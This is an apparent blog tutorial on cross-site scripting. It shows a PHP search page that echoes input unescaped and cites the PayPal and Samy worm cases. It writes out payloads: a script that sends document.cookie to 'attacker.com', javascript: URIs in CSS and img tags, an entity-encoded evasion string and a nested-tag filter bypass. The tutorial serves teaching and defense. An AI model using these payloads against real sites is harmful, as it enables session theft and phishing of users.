Cheigro

Cross Site Scripting (XSS)

Cross Site Scripting (XSS)

El Hadramy Cheiguer's photo
El Hadramy Cheiguer
·

3 min read

Cross Site Scripting: Attack occurs when application takes untrusted data and sends it to a web browser without proper validation or sanitization

Search Example:

https://google.com/search?q=<search term >

https://google.com/search?q=<search term >
<html>
    <title>Search Results</title>
    <body>
        <h1>Results for <?php echo $_GET["q"] ?></h1>
    </body>
</html>

Normal Request:

https://google.com/search?q=cheigro
<html>
<title>Search Results</title>
<body>
<h1>Results for <?php echo $_GET["q"] ?></h1>
</body>
</html>

Sent to Browser
<html>
<title>Search Results</title>
<body>
<h1>Results for cheigro</h1>
</body>
</html>

Embedded Script:

https://google.com/search?q=<script>alert(“hello”)</script>
<html>
<title>Search Results</title>
<body>
<h1>Results for <?php echo $_GET["q"] ?></h1>
</body>
</html>
Sent to Browser
<html>
<title>Search Results</title>
<body>
<h1>Results for <script>alert(“hello")</script></h1>
</body>
</html>

https://google.com/search?q=<script>…</script>
<html>
<title>Search Results</title>
<body>
<h1>Results for
<script>
window.open(“http:///attacker.com?”+cookie=document.cookie)
</script>
</h1>
</body>
</html>

Types of XSS:

An XSS vulnerability is present when an attacker can inject scripting code into pages generated by a web application.

Two Types:

Reflected XSS.

The attack script is reflected back to the user as part of a page from the victim site.

Stored XSS.

The attacker stores the malicious code in a resource managed by the web application, such as a database.

Reflected Example :

Attackers contacted PayPal users via email and fooled them into accessing a URL hosted on the legitimate PayPal website.

Injected code redirected PayPal visitors to a page warning users their accounts had been compromised.

Victims were then redirected to a phishing site and prompted to enter sensitive financial data.

Stored XSS

The attacker stores the malicious code in a resource managed by the web application, such as a database.

Samy Worm

XSS-based worm that spread on MySpace. It would display the string "but most of all, samy is my hero" on a victim's MySpace profile page as well as send Samy a friend request.

In 20 hours, it spread to one million users.

MySpace Bug

MySpace allowed users to post HTML to their pages. Filtered out

<script>, <body>, onclick, <a href=javascript://>

Missed one. You can run Javascript inside of CSS tags.

<div style="background:url('javascript:alert(1)')">

Filtering Malicious Tags

For a long time, the only way to prevent XSS attacks was to try to filter out malicious content

Validate all headers, cookies, query strings, form fields, and hidden fields (i.e., all parameters) against a rigorous specification of what is allowed

‘Negative’ or attack signature based policies are difficult to maintain and are likely to be incomplete

Filtering is Really Hard

Large number of ways to call Javascript and to escape content

URI Scheme:

 <img src=“javascript:alert(document.cookie);”>

On{event} Handers: onSubmit, OnError, onSyncRestored, … (there’s ~105) Samy Worm: CSS

Tremendous number of ways of encoding content

<IMG_SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000
114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#00
00114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#
0000041>
Google XSS FIlter Evasion!

Filters that Change Content

Filter Action: filter out <script
Attempt 1: <script src= "…">
src="…"
Attempt 2: <scr<scriptipt src="..."
<script src="...">
XSSWeb Security